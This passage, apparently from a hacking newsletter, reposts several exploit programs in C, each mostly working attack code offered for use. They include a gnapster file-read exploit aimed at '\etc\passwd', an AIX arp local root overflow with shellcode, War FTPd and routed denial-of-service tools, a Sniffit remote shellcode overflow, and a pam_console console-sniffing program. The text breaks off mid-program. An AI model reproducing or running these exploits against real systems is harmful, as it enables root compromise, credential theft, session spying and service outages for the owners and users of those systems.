Derek Callaway -- S@IRC * * Exploits a gnapster bug... (probably exists in other clients, too.) * Greetings: inNUENdo, s0ftpj, napster * I discovered some service denial techniques while coding; see below. */ #include #include #include #include #include #include #include #include #include void vexit(const char *func){perror(func);exit(EXIT_FAILURE);} int main(int argc,char**argv){ int sock,port,len; struct hostent *he; char str[4096],buf[4096],*sln,*op,c; struct sockaddr_in ta; if(argc<3){ printf("napstir by S\n"); printf("usage: %s host file [port] [username]\n",argv[0]); printf("example: %s metallica.com ",argv[0]); printf("\"\\etc\\passwd\" 6699\n"); printf("default port is 6699\n"); printf("default username is Lamer (usually not required)\n"); exit(EXIT_SUCCESS); } if(!(he=gethostbyname(argv[1])))vexit("gethostbyname"); ta.sin_family=AF_INET; ta.sin_addr=*((struct in_addr*)he->h_addr); if(argv[3]){ port=strtol(argv[3],(char**)0,10); if(errno==ERANGE)vexit("strtol"); } else port=6699; ta.sin_port=htons(port); memset(&ta.sin_zero,0,sizeof(ta.sin_zero)); if((sock=socket(AF_INET,SOCK_STREAM,0))<0)vexit("socket"); if(connect(sock,(struct sockaddr*)&ta,sizeof(struct sockaddr))<0) vexit("connect"); /* I wonder what this byte is for. */ recv(sock,&buf,1,0); /* 9 is the code for T1 bitrate -- Most clients ignore the username * field. */ sprintf(str,"%s \"%s\" 9",(argc>=4)?argv[4]:"Lamer",argv[2]); send(sock,"GET",3,0); send(sock,(char*)str,strlen(str),0); /* * SERVICE DENIAL CODE * * Uncomment this line if you'd like to crash knapster. :-) * send(sock,"0",1); */ if(!(op=sln=(char*)malloc(1024)))vexit("malloc"); do { read(sock,&c,1); sprintf(sln,"%c",c); sln++; } while(isdigit(c)); *sln=0; sln=op; len=strtol(sln,(char**)0,10); if(errno==ERANGE)vexit("strtol"); write(STDOUT_FILENO,&c,1); if((port=read(sock,&buf,len-1))<0)vexit("read"); write(STDOUT_FILENO,buf,port); exit(EXIT_SUCCESS); } /* www.hack.co.za [14 May]*/ @HWA 264.0 [IND] SSG-arp.c aix 4.1 local overflow by cripto. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cripto@subterrain.net /* * AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000 * * This code is largely from an old AIX mount exploit by Georgi Guninski. * Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340! * * Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom. * * -cripto .o0-> SSG ROX 2000 !@#$$#@! <-0o. */ #include #include #include #define OFFSET 3580 char prog[100]="/usr/sbin/arp"; char prog2[30]="arp"; extern int execv(); char *createvar(char *name,char *value) { char *retval; int l; l = strlen(name) + strlen(value) + 4; if (! (retval = malloc(l))) { perror("malloc"); exit(2); }; strcpy(retval,name); strcat(retval,"="); strcat(retval,value); putenv(retval); return retval; } main(int argc,char **argv,char **env) { unsigned int code[]={ 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 , 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c , 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 , 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c , 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 , 0x7c0903a6 , 0x4e800420, 0x0 }; #define MAXBUF 600 unsigned int buf[MAXBUF]; unsigned int frame[MAXBUF]; unsigned int i,nop,mn; int max; int QUIET = 0; int dobuf = 0; char VAR[30] = "LC_MESSAGES"; unsigned int toc; unsigned int eco; unsigned int *pt; char *t; int egg = 1; int ch; unsigned int reta; int corr = 4604; char *args[4]; char *newenv[8]; int justframes = 1; int startwith = 0; mn = 78; max = 100; if (argc > 1) { corr = atoi(argv[1]); } else { corr = OFFSET; } pt = (unsigned *) &execv; toc = *(pt+1); eco = *pt; if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF)) { perror("invalid input"); exit(1); } #define OO 7 *((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff); *((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) & 0x0000ffff); *((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff); *((unsigned short *)code + OO + 6 ) = (unsigned short) ((eco >> 16) & 0x0000ffff); reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr; for(nop = 0;nop < mn;nop++) buf[nop] = startwith ? reta : 0x4ffffb82; strcpy((char*)&buf[nop], (char*)&code); i = nop + strlen( (char*) &code)/4-1; if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000)) { perror("Return address has zero"); exit(5); } while(i++ < max) buf[i] = reta; buf[i] = 0; for(i = 0;i < max-1;i++) frame[i] = reta; frame[i] = 0; if(QUIET) { puts((char*)&buf); fflush(stdout); exit(0); }; newenv[0] = createvar("EGGSHEL", (char*)&buf[0]); newenv[1] = createvar("EGGSHE2", (char*)&buf[0]); newenv[2] = createvar("EGGSHE3", (char*)&buf[0]); newenv[3] = createvar("EGGSHE4", (char*)&buf[0]); newenv[4] = createvar("DISPLAY", getenv("DISPLAY")); newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame : (char*)&buf):NULL; newenv[6] = NULL; args[0] = prog2; execve(prog,args,newenv); perror("execve\n"); } /* www.hack.co.za [10 May]*/ @HWA 265.0 [IND] warftpd.c win95 remote dos attack by eth0. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* coded by eth0 from buffer0verfl0w */ /* tested by morpha */ /* *NOTE* Original exploit was coded for winbl0wz *NOTE */ /* Vulnerable: War FTPd version 1.66x4 War FTPd version 1.67-3 Immune: War FTPd version 1.67-4 War FTPd version 1.71-0 The buffer overflow seems to occur because the bound check of the command of MKD/CWD is imperfect. This means that although anyone can overflow the statically assigned buffer that stores the requested path, you cannot overwrite the RET address and therefore it's impossible to cause War FTPd to execute arbitrary code. However, it is a simple mechanism for performing a Denial of-Service against the server. Solution: War FTPd 1.70-1 does fix this problem, but it contains other vulnerabilities (see our additional information section). */ #include #include #include #include #include #include #include #include #include #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 #define PASS "PASS eth0@owns.your.ass.com\r\n" #define LOGIN "USER anonymous\r\n" int expl0it(char *host) { struct hostent *hp; struct in_addr addr; struct sockaddr_in s; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; /* u_char buf[280]; */ int p, i; hp = gethostbyname (host); if (!hp) exit (1); bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = 2, 1, IPPROTO_TCP); s.sin_port = htons (FTP_PORT); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); if(connect (p, &s, sizeof (s))!=0) { printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT); return; } else { printf("Connected!\n"); write(p, LOGIN, strlen(LOGIN)); write(p, PASS, strlen(PASS)); memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(p,(char *)packetbuf,strlen((char *)packetbuf),0); printf("DONE!\n"); } return(0); } int main(int argc, char *argv[]) { if(argc<2) { printf("Usage: %s [host] \n",argv[0]); return; } else { expl0it(argv[1]); } return(0); } /* www.hack.co.za [10 May]*/ @HWA 266.0 [IND] sniffit.c remote linux misc overflow by fusys. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.s0ftpj.org/ /* * Sniffit 0.3.7beta Linux/x86 Remote Exploit * ShellCode is a modified version of w00w00 write egg, * to pass Sniffit input filter * * Tested on RedHat 5.2, 6.0, 6.2 * Proof Of Concept Code * * credits: |CyraX| for pointing me to the coredump * del0 for hurrying me :) * vecna for offering me drinks ;P * belf for loving and caring his GSM ;P * * FuSyS [S0ftpj|BFi] * http://www.s0ftpj.org/ */ #include #include #include #include #include #define LENGTH 600 #define RET RH6x #define RH52 0xbfff5c10 #define RH6x 0xbfff5bb5 // 0.3.6HIP 0xbfffcc50 #define OFFSET 0 #define ALIGNOP 3 // 3 RH6.0, 4 RH6.2 // may vary [1-5] /* Note To Script Kiddies: This ShellCode Simply Changes An Existing /etc/motd So Don't Bother DownLoading */ unsigned char shellcode[]= "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb" "\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4" "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31" "\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f" "\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77" "\x61\x73\x20\x68\x65\x72\x65\x0a"; unsigned long nameResolve(char *hostname) { struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname)) == -1) { if(!(hostEnt=gethostbyname(hostname))) { printf("Name Resolution Error:`%s`\n",hostname); exit(0); } bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } int main(int argc,char **argv) { char buff[LENGTH+ALIGNOP+1]; char cmd[610]; long addr; unsigned long sp; int offset=OFFSET; int i, x; int sock; struct sockaddr_in sin; if(argc<2) { fprintf(stderr, "Usage: %s \n", argv[0]); exit(0); } sp=(unsigned long) RET; addr=sp-offset; for(i=0;i<120-ALIGNOP;i++) buff[i]=0x90; for(x=0; x> 8; buff[i+2] = (addr & 0x00ff0000) >> 16; buff[i+3] = (addr & 0xff000000) >> 24; } printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n"); printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n"); memset(&sin,0,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=htons(25); sin.sin_addr.s_addr=nameResolve(argv[1]); printf("Connecting to %s ...\n", argv[1]); if((sock=socket(AF_INET,SOCK_STREAM,0))<0) { printf("Can't create socket\n"); exit(0); } if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0) { printf("Can't connect to Sniffit Server\n"); exit(0); } printf("Injecting ShellCode ...\n"); strncat(cmd, "mail from:", 10); strncat(cmd, buff, strlen(buff)); write(sock, cmd, strlen(cmd)); printf("Done!\n\n"); return(0); } /* www.hack.co.za [10 May]*/ @HWA 267.0 [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* A vulnerability exists in the pam_console PAM module included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in or a user su's to root. They could also surreptitiously execute commands as the user on the console. Affected: RedHat Linux 6.2, 6.1, 6.0 */ #include main(int argc,char*argv[]) { char buf[80*24]; int f=open(argv[1],O_RDWR); while (1) { lseek(f,0,0); read(f,buf,sizeof(buf)); write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi write(1,buf,sizeof(buf)); usleep(10000); } } /* www.hack.co.za [10 May]*/ @HWA 268.0 [IND] routedsex.c slackware 7 remote dos attack by xt. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ brandon@james.kalifornia.com /* routedsex.c by xt of XOR (brandon@james.kalifornia.com) DoS attack against the routed daemon. description: i noticed a while back, when i was screwing with routed, that RIP packets destined for routed (port 520) caused it to log an 'unknown router' error to the system log. if i flooded it with the same spoofed IP address, it would just say that the last message was logged X times. but, if they're randomly spoofed, it logs each one. so this causes a DoS attack against the hard drive space of the system. the syslog will eventually fill up. run this program a couple of times against a host to make the system log fill up even quicker. here's an excerpt from the /var/log/syslog file on my system: ... routed[3067]: packet from unknown router, 45.138.23.14 and many, many, many more.. 800K file so far after 40 seconds of attacking it. this has been tested on slackware linux 7.0. should work on all linux, may need a couple of tweaks to compile on some distributions, such as the ever so crappy RedHat and it's clones (i *HATE* redhat). anyways, have fun. btw, XOR is looking for more members.. if you're interested in joining, read http://xorteam.cjb.net. - xt */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* i think i took this line from a syn flooder.. */ #define ranipbit(a, b) ((rand() % (((b) + 1) - (a))) + (a)) u_short chksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 1; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int dolphin (int sock, struct sockaddr_in *sin, char *rp, int sizerp, u_long source, u_long victim) { struct udphdr udp; struct iphdr ip; char packet[8092]; int ret; ip.id = htons(31337 + (rand() % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + sizerp); ip.saddr = source; ip.daddr = victim; ip.check = chksum((u_short *) &ip, sizeof(ip)); udp.source = htons(520); udp.dest = htons(520); udp.len = htons(8 + sizerp); udp.check = 0; memcpy(packet, (char *) &ip, sizeof(ip)); memcpy(packet + sizeof(ip), (char *) &udp, sizeof(udp)); memcpy(packet + sizeof(ip) + sizeof(udp), (char *) rp, sizerp); ret = sendto(sock, packet, sizeof(ip) + sizeof(udp) + sizerp, 0, (struct sockaddr *) sin, sizeof(struct sockaddr_in)); return ret; } int main(int argc, char **argv) { u_long victim, stop = 0, srcaddr, udelay = 100; int sock, dos = 1, riptype = 1; struct sockaddr_in sin; struct rip rp; struct netinfo *neti = rp.rip_nets; struct hostent *hp; if (argc < 4) { fprintf(stderr, "routesex.c by xt of XOR\n"); fprintf(stderr, "usage: %s